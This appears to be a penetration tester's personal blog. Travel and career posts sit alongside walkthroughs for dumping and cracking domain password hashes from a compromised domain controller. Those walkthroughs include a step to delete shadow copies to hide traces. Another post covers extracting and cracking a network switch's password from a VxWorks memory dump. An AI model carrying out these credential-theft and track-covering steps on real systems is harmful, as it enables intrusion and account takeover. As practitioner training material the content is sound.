Starting off 2017 right! (I hope…..)

Well its 2017 already, and I am not sure where 2016 went.

Last year I was extremely busy, traveling about every week and multiple ROC’s due weekly for my previous company. Never had enough time to actually do my job well or even think about fixing the issues that we had. Now that I am at Coalfire, I have plenty of time to do my job, with tons of resources to help me out. I am not traveling as much, which I sort of miss, hope that changes a little starting soon. Working from home is a little weird, not sure it is something I really like, miss the interactions with other people. Not that I do not like my family, its just getting out of the house for a little while and talking to other people with similar interests. Will be trying to get former colleagues to do lunch once in a while to at least try to keep up with whats going on.

This year is starting off fairly decent for me, since I am getting to attend two different training classes. First one is an ISO 27001 Lead Auditor certification course. I will be heading to Colorado for a few days. The class was supposed to be for junior associates that needed a certification to allow them to get their QSA. I asked if their was space I would like to attend, and I guess there was room for me. The second class is PCI P2PE certification, which will be a little harder from my perspective. Most of my cryptography experience is military related and not really geared towards the commercial sector. If I pass this course, I have been asked if I wanted to take the PA-DSS course and then possibly the PA-P2PE course. Since they are in need of people to assist in that area, I said why not. I am always willing to take training classes, certifications never hurt anyone.

So it looks like my first full ROC I am lead on will be a client that they have had for a while. This should be fairly nice to get to learn their methodology, and show my manager, I am able to do the work. I was brought in as a consultant, and not a senior consultant. That was something I had decided to do, I originally had interviewed for a senior security consultant position, but since they were willing to pay me the same for either position, I took the lower level position. I am sure some are going WTF, I would never do that. Well, I am more than capable to be a senior consultant, but If I come in as a junior level person and can show that I am very good at my job, I will more than likely get a promotion or possibly opportunities to do other stuff. Which is sort of what is happening already with the certification courses.

Well 2017, lets hope things keep rolling along smoothly…..   

ARCYBER Puzzle

Had a former colleague post a cipher puzzle on a Slack channel I hang out on.

http://www.recruitahacker.net/Puzzle

I figured I would give it a try, since I like to do puzzles.
The site was a link to an ARCYBER web site:

Looking at the cipher text, I was like you have to be kidding me. This is too easy, so I ran it through a script I made a few years back to break vigenère ciphers for another puzzle I had worked.

While the script is not perfect, it was able to decode this cipher text.

Eexl fmoi! 
Well done!

Jabnh gsl’ze decbjrx lvtv, gsl uak hctf xyw gvltpj 
Since you’re reading this, you may have the skills

inp mqrjzrlwzq bs awiz tjc Bvdq hpdu! 
and motivation to join the Army team
Pvirz mqpf esgie bwyi xofeprjec xiexzi nqtt ATAZFVJ.
Learn more about your potential future with ARCYBER.

KEY:
iamacybersoldier

So putting the key into the website you get the full response.

You got a link to email someone that you solved the puzzle.

So I was like sure, what could it hurt, might get an offer to apply for some cool jobs with the government (not really).

The response from my email to solving the puzzle.

Congratulations on solving the puzzle and for your interest in the Army’s cyber mission. We ask that you fill out a form found at http://www.goarmy.com/info/send1/?iom=GT45-FY16-ACNP-OT-XXX-XX-XXX-CP-XX-X-XXX   so we can continue discussions about how you can best fit into our Army’s cyber professional workforce. We thank you for your inquiry and are committed to providing information as it becomes available. You may check out our website for the latest cyber career field updates at www.arcyber.army.mil.
v/r,
Mike Milord
Public Affairs Specialist
Army Cyber Command
8605 6th Armored Cavalry Road
Fort Meade, MD 20755
301-833-2007
michael.o.milord.civ@mail.mil

It takes to the Army website to request information to join.
I figure since I already have 24 years of service in the military they will not want me.

Getting Hashes From NTDS.dit File – Updated Version

Moved from my old WordPress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. I generally prefer to create a new copy, so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily Windows has built in tools to assist with collecting the files needed.
Vssadmin tool
List Volume Shadow Copies on the system:
C:vssadmin list shadows
Example: ‘vssadmin list shadows’ no Shadows Available
C:>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:vssadmin create shadow /for=C:
Example: ‘vssadmin create shadow’ copy:
C:>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy looks similar to the lines below:

\?GLOBALROOTDevice<SHADOWYCOPY DISK>windows<directory><File> <where to put file>

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowsntdsntds.dit .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSYSTEM .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSAM .
[X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case.
Having had a couple times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLMSYSTEM c:SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
Now that you have the files, it is time to get the hashes
Utilities needed:
 • libesedb
• ntdsxtract
libesedb
Download libesedb: (Use which ever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
 Runing esedbexport to extract ntds.dit data:
./esedbexport -t <Directory to export data to> <ntds.dit file>

.export will be added to the end of the directory listed above

EXAMPLE:
# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsuser.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
–sid <user sid>
List user identified by SID
–guid <user guid>
List user identified by GUID
–name <user name regexp>
List user identified by the regular expression
–active
List only active accounts
–locked
List only locked accounts
–syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
–lmoutfile <name of the LM hash output file>
–ntoutfile <name of the NT hash output file>
–pwdformat <format of the hash output>
ophc – OphCrack format
When this format is specified the NT output file will be used
john – John The Ripper format
ocl – oclHashcat format
When this format is specified the NT output file will be used
–passwordhashes
Extract password hashes
–passwordhistory
Extract password history
–certificates
Extract certificates
–supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
–membership
List groups of which the user is a member
–csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
–debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
–lmoutfile (output file for LM hashes)
–ntoutfile (output file for NTLM hashes
–pwdformat john (output in JTR format)
–syshive (SYSTEM file from system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> –passwordhashes –lmoutfile <LM OUT FILE> –ntoutfile <NTLM OUT FILE> –pwdformat john –syshive <SYSTEM FILE>
(Add –passwordhistory to get previous hashes for each user, will vary on number hashes based on Domain settings for password history)
Example Output in JTR Format:
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map' [+] Rebuilding maps...
[+] Scanning database - 100% -> 40933 records processed
[+] Sanity checks...
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information - 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need…. it is time to start cracking passwords to get to that data you wanted…

Derbycon 4.0

Well Derbycon 4.0 is over, and now things have to go back to normal.
My boss has already scheduled me 3 new projects, and I have not finished last weeks projects because I was too excited to get to Derbycon.
Completed the Urban Bourbon Trail (all in half a day, which I do not recommend unless you have the full day). Started at 2pm on Thursday after arriving at the Hyatt in Louisville KY. and was done by 8pm that night. Felt terrible most of Friday morning but did not stop me from getting in on the CTF.
Had a blast at Derbycon, spent most of my time playing CTF and hanging out with friends.
Team nanerpwn came in 2nd place in the CTF, and we had a good lead for most of the time on Friday and Saturday. Could not hold on to the lead towards the end, had a few people drop off to head back home early. So maybe next year we will come in 1st, if we can get everyone to stay until Sunday afternoon.
Ready for Derbycon 5.0

Getting Hashes from NTDS.dit file

Read a writeup from @Mubix about doing this and noticed that some changes had come to the NTDSxtract software which made things a little easier, so I decided to do a write up on on the two versions
Why do you want to do this anyways?
The reason you would want to pull the ntds.dit file from a Domain Controller after you have compromised it is because you do not want to create a new Domain Administrator account (could set off alerts) and need password hashes; or you need a password for another account to access data you want (ie. SQL Server accounts).

Get the ntds.dit and SYSTEM from Volume Shadow Copy on a Domain Controller

1. Vssadmin tool

1.1 List Volume Shadow Copies on the system:

Example: ‘vssadmin list shadows’ no Shadows Available
C:>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line too
(C) Copyright 2001 Microsoft Corp.
No items found that satisfy the query.

1.2. Create a new Volume Shadow Copy of the current drive:

Example: ‘vssadmin create shadow’ copy:
C:>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
Successfully created shadow copy for ‘c:’
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1

2. Pull files from the Volume Shadow copy

copy \?GLOBALROOTDevice<SHADOWYCOPY DISK>windows<directory><File> <where to put file>
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowsntdsntds.dit .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSYSTEM .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSAM .
 [X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1 (there could be multiple copies, use the last one listed)
I would also recommend getting a current copy of SYSTEM from the registry just in case.
reg SAVE HKLM/SYSTEM c:SYS
I have had a couple times where the SYSTEM file from the shadow copy was corrupt.

3. Delete the shadows to cover your tracks:

vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
vssadmin delete shadows /for=C: /shadow= e8eb7931-5056-4f7d-a5d7-05c30da3e1b3

4. Optional VSSOwn Script to help with this task:

http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs

5. Now that you have the files, it is time to get the hashes

5.1 Utilities needed:

  • libesedb
  • ntdsxtract

5.2 libesedb

https://code.google.com/p/libesedb/
http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

Extract the files

# tar -xzvf libesedb-alpha-20120102.tar.gz

Compile/make libesedb

# cd libesedb-20120102
# ./configure
# make
Need to move this somewhere like ‘/usr/local/’
# mv esedbtools/ /usr/local
# cd esedbtools/

esedbexport usage:

Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source
source: the source file
-c:     codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h:     shows this help
-l:     logs information about the exported items
-m:     export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t:     specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T:     exports only a specific table
-v:     verbose output to stderr
-V:     print version

Run esedbexport to extract ntds.dit data :

./esedbexport  -t  <Directory to export data to(will add .export to the end)> <ntds.dit file>
# ./esedbexport  -t ~/ntds ~/ntds.dit
esedbexport 20120102
Opening file.

Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

Extracted files:

# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

5.3 NTDSXtract:

http://www.ntdsxtract.com/
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip
# unzip ntdsxtract_v1_0.zip
# cd NTDSXtract 1.0/
To update to the new 1.2 Beta version unzip the contents in side the “NTDSXtract 1.0”
(You might want to rename the directory to just NTDSXtract)
# unzip ntdsxtract_v1_2_beta.zip

Usage for dsuser.py (Version 1.0 and 1.2 Beta)

Ver 1.0
 # python dsusers.py
DSUsers
Extracts information related to user objects
usage: dsusers.py <datatable> <linktable> [option]
options:
--rid <user rid>
List user identified by RID
--name <user name>
List user identified by Name
--passwordhashes <system hive>
Extract password hashes
--passwordhistory <system hive>
Extract password history
--certificates
Extract certificates
--supplcreds <system hive>
Extract kerberos keys
--membership
List groups of which the user is a member
Ver 1.2
 # python ../NTDSXtract 1.0/dsusers.py 
DSUsers v1.2
Extracts information related to user objects
usage: ../NTDSXtract 1.0/dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
  linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its
cache files and output files. If the directory does not exist
it will be created.

options:
--rid <user rid>
List user identified by RID
--name <user name>
List user identified by Name
    --syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile    <name of the LM hash output file>
--ntoutfile      <name of the NT hash output file>
--pwdformat  <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
--passwordhashes
Extract password hashes
    --passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract kerberos keys
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the output

Extract user info:

Ver 1.0
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 --passwordhashes ~/sys --passwordhistory ../sys
Running with options:
Extracting password hashes
Extracting password history
Initialising engine...
Scanning database - 100% -> 40933 records processed
Extracting schema information - 100% -> 4142 records processed
Extracting object links...

List of users:
==============
Record ID:           1815
User name:           Administrator
User principal name: Administrator@DOMAIN
SAM Account name:    Administrator
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 3543ea4c-f755-4758-97c0-3d63dffc96ad
SID:  S-1-5-21-657512695-1375287660-316888650-500
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 16:10:29
Account expires:      Never
Password last set:    2006-08-22 11:53:34.828125
Last logon:           2013-10-03 19:11:25.366397
Last logon timestamp: 2013-09-30 10:43:09.479359
Bad password time     2013-10-03 17:36:20.168265
Logon count:          65535
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Domain Admins Administrator
Password hashes:
    Administrator:$NT$0817033191709a45c93baa986d933d0e:::
Password history:
    Administrator_nthistory0:$NT$0817033191709a45c93baa986d933d0e:::
    Administrator_nthistory1:$NT$70aa17fabbaf3b0511f430844c6de431:::
    Administrator_lmhistory0:f8eab0fa471aff3edab057c59e5d0aa5:::
Record ID:           1816
User name:           Guest
User principal name:
SAM Account name:    Guest
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 2e792141-c4be-43b2-a4f5-079e5d05e184
SID:  S-1-5-21-657512695-1375287660-316888650-501
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 15:19:28
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     2013-10-03 18:18:45.096975
Logon count:          0
Bad password count:   1
User Account Control:
Disabled
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Users Guest
Password hashes:
Password history:
….(Continues for each Account)….
Ver 1.2 (Output in JTR Format)
python dsusers.py ~/ntds.export/datatable.3  ~/ntds.export/link_table.4 ~/TEMP  --passwordhashes --passwordhistory --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

List of users:
==============
Record ID:           32777
User name:           joe smith
User principal name: email@address.net
SAM Account name:    jsmith
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 14c15e2a-8f7c-4404-a63c-cb6a4c689c00
SID:  S-1-5-21-349701255-3731294407-2303513147-3800
When created:         2005-06-01 13:50:37
When changed:         2013-12-12 15:08:12
Account expires:      Never
Password last set:    2013-10-07 13:20:19.146593
Last logon:           2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time     2013-12-11 00:04:52.446209
Logon count:          6239
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users joe smith
Password hashes:
name:$NT$2e8fc4b95229a6ea67b1f69d04ee4000:::
name:e4c2436ddd1f655c6eedd0fa5525f000:::
….(Continues for each Account)….
Version 1.2 allows you to extract the hashes into two files, one for LM hashes the other for NT hashes, and currently supports two hash output types; Ophcrack and John.

VxWorks Memory Dump

While running an internal vulnerability scan I noticed that one of the devices was showing vulnerable to VxWorks Memory Dump.
This is exploitable by using the Metasploit wdbrpc_memory_dump module, so I fired it up and loaded the module to see if I could pull the memory from this device.
vxworks
I run the exploit against the system and it began dumping the memory, and it got to about 31% before stopping, so I had to restart it from the OFFSET value it stopped at. This happened 3 more times before it finished. The output file was about 256MB in size, so I was not sure if it had good information from the system or just crap.
Being that it was a hex dump of the memory, I ran strings against the file to get a list of information and look for possible information to use. I put the output into another file to search through with “grep”.
            #strings vxworks_memory.dmp > strings.memory.dmp
I was able to determine that it was a network switch from viewing the IP address on port 80 (looked back at Nessus to see what ports where open and what it thought the device was), so I decided to search for words like “password”, “enable”, and “encryption”.
At first nothing showed up that was any good or valuable to use, so I decided to search for partial words, like “assw”, “able” and “crypt” to see if the words had been split across lines in the memory dump.
            #cat strings.memory.dmp | grep -i assw
            #cat strings.memory.dmp | grep -i crypt
I discovered that the enable hash was in the dump, so I guessed that the password could also be stored in there as well.
Taking the new file from the strings output (strings.memory.dmp), I ran it through “sort” with the unique flag and output that into another file to use as my password list starting point.
            #cat strings.memory.dmp | sort –u > passlist.list
With new list of possible passwords, and hoping that one copy of it was completely intact and not split across a line. I ran it through PW-Inspector to narrow it down to a more manageable number and realistic passwords and an actual realistic length.
            #pw-inspector –I passlist.list –o passlist.uniq.list –lunps –m 8 –M 16
Now that I had narrowed the password list down to a more manageable solution, I ran John against the hash with the shorter list.
john_vxworks
In no time at all I had the password for the hash, the switch was not Cisco and was only using an MD5 hash, which made it rather simple to crack.
Now that I had the password, I needed to search for a user name. So I started searching for common names in the file, and admin came back multiple times with the word user next to it, so with a little searching on Google, I discovered that admin was the default user on this switch.
From there I tried to SSH to the switch, but was denied due to the use of private keys and not passwords for SSH, so I tried telnet to connect to the switch and was able to login.
From there I had access to see all of the other VLANS, and IP address space that I did not have access to before. Now time to see where  else the password is used.

Fun times during NVA/PT assessments over the past 3 months

Some fun things I have had to deal with during some NVA/PT assessments for customers over the past 3 months.
You begin scanning 5 hosts and the customers switch rolls over, everything stops responding, and the customer calls you asking what you did.
I enjoy customers that leave usernames and passwords for critical systems on a web page with unauthenticated access, and they say that it is not a security vulnerability.
You find access to a customers Github.com site and your boss tells you to not explore the site and only report that you had access to login, since the site was not in scope.
You report a finding that you found last year for the same customer, and it allows you complete access to the server.
You find default access to a website that controls the customers network switches, UPS, and other main pieces of their infrastructure, and the customer says he is not worried about.
You find systems that are missing patches from 2004, and the customer tells you that it is not critical. You tell them to remove it from the network, and they tell you they need it for some other system that is important.
I am sure I will have more to come in the next few months, since my boss is stacking up assessments like they are going out of style, and we are still trying to hire a new pentester.

2nd Bahrain Trip

Well I had to go back to Bahrain to work for another 5 weeks, was really not wanting to go, but I had already committed to the trip with the first 7 week trip that I did. Had a lot of stuff that needed me to be home, but luckily my wife was able to handel it in my absence.
The demonstrations were a lot lighter this trip, and I actually only saw a few burning tires (the burning remnants only). There were plenty of police and military vehicles everywhere, which might have been the reason for the fewer incidents.
Since I have already visited almost the entire Island, I did not venture out as much this trip. Went to the souq (open air market) only a few times just to see if anything new was being sold. Nothing really new, just the same stuff as before, I did pickup a few trinkets for the boys, and some jewelry for my wife.
I received a ticket to attend the Bahrain Formula 1 Grand Prix, which was an awesome event, it lasted 3 days. There were qualification runs the first two days, and some races by the smaller cars. Had some cars from the Formula Middle East, and Grand Prix 2 race a couple smaller runs. The last day was the actual race for the Formula 1, and it was followed up with a concert from Ne-yo. I would definitely recommend that if you are in Bahrain in April, this would be a must do.
My time flied this trip, and I am glad to be home. I will miss some of the friends that I have made while spending time over there, but I really started to miss the family.

Living in Bahrain for 50 days

Well I have been living in Bahrain for about 50 days now, and I am ready to head back to the United States. It is a little different living over here, most of the people are  very nice, many cannot drive let alone stay in any lane on the road. Many drivers like to honk their  horns; which can get a little annoying at times, especially when the light is just about to turn green and just incase you had not noticed that it was turning green they wanted to let you know by honking their horn. I have learned that if you can drive on it people will, no matter if it is the road or not, shoulders are almost like an extra lane for many people, even the dirt along the road can become an extension of the road for many people. I have seen a 3 lane road turn into a 5 lane road, with people all over the place, and as close to each other as possible with out hitting one another.
The dust in the air is awful at times and  my eyes have been red the entire time I have been here, and my nose has been stopped up as well on several occasions. The weather has been fairly nice, compared to Knoxville Tennessee, which it has been snowing and raining there.
Have not had too many problems finding something to eat, there are dozens of American restaurants here. There is even a street referred to as American Alley (next to the Navy Base) and another called Shawarma Alley due to the multiple ( I believe 4) food stands located to each other on the small road.
  • McDonalds
  • Hardees
  • KFC
  • Pizza Hut
  • Papa Johns
  • Burger King
  • Subway
  • Polo Campero
  • PotBelly sandwiches
  • Fatburger
  • Fuddruckers
  • Chilis
  • Bennigans
  • Carrinos
  • Hard Rock Cafe
  • TGIFridays
  • Gloria Jeans
  • Starbucks
  • Aunt Annie
  • Baskin Robins
  • Cold Stone Creamery
There are probably places I am forgetting but these are the ones I have seen an can remember at the present time. I was actually surprised at the amount of American food places to eat at. Plus they all seem to have delivery which is usually guys on motorcycles and a box attached to the back of the bike.
Delivery Guy

Chili’s Delivery driver, would love to have this back home, getting chips and salsa delivered would be awsome.

There is a large Police and Military presence around town, and at times there are demonstrations.
DSC03300

Police and Military parked along the road all over the place.


DSC02801Small demonstration I ran into driving down the road one day. police where shooting tear gas, demonstrators throwing rocks.

All in all it has been a decent trip, seen many interesting places, and people, but it is time to head home. The prices are not any cheaper like many people have told me they would be, in some cases they are the same or a little higher. It does seem to be cheaper due to the prices but when 1 Dinar is equal to 2.5624 US Dollars, that 5 Dinar item is actually 13.26 USD. I can get a Big Mac combo meal (small drink and fries) for 1.500BHD which is $3.98 USD a little cheaper than the US prices I believe, but the drink and fry sizes are smaller portions which would make up the difference in price.
Purchasing local items can be fairly cheap, but anything that is shipped in from other countries, is generally not cheaper. Purchasing Kraft cheese compared to local cheese is about double the price in some cases.
Many of the local shops (not grocery stores, or food places) expect you to haggle with them over prices of some items, so they will give you a high price when you ask. You have to know the value of the item before hand to get a good price, which is not always easy to do. Places near the Navy base, or other Expat areas are generally going to try to get you to pay more than it is worth, because they know you will pay it.
Bahrain Snacks

Picked up some snack to bring back with me, samboosa, mahtai, and some Fisthakiya.

Food For Matt


Picked up a few items for my oldest son who is getting into cooking for his friends, and himself.  He can cook an Indian style meal for his friends to try.


Rugs

Picked up a few smal rugs for family and friends as gifts, they were 3BHD a piece or about $8.00 USD, they are about 12’x12′ in size, and are all hand made locally .

Spent a lot of time traveling around to all of the shop areas, and looking at all of the different items that are for sale, many are fakes of original items, or cheap knock offs. Some items are cheap tourst items, that they try to sell for a premium. There are many shops located all over the city, and can be as small as a single room or as large as a full department store. You name it you can probably find it here, not sure if it will be an original version of what you are looking for but you can find at least a fake version of it.
I have picked up enough items to fill a full size suitcase, and had to purchase a small duffle bag to bring items back with me to the US. I am hoping I have not gone over my $800 limit of tax free items, or I will have to pay tax on anything over the amount. Will have to check my total count of money spent and make sure I am not over. Since I have a 7 hour layover in Amsterdam I am sure I will find some more items there that I want to pick up for the family.
Well getting ready to head home, for a few weeks of relaxation, and some normalcy, then back over here for another 35 days of fun.


50 days in Bahrain

My work in sending me to Bahrain for 50 days (90 total days) to work, my project will be split up into to parts. I will be onsite working for the first 50 days and then be back for the other 40 days, to finish up working.
I plan on keeping a daily log of my events, not sure what access to the internet I will have, and what I should post while I am in country. I have heard that they country limits certain activities and websites from being viewed.
I have been following several new sites, and have signed up for the US Embassy feeds, along with continually watching the US Navy 5th Fleet site to see what is happening in country.
I have a nice long flight, starting on January 9th leaving McGhee Tyson heading to Detroit, have a 1:30 layover before heading to Amsterdam. Flying in Economy Plus, because my company is too cheap to get me Business class. The flight is supposed to be about 8 hours long, and then a 4 hour layover in Amsterdam before my 8 hour flight to Bahrain, with a stop in Abu Badui.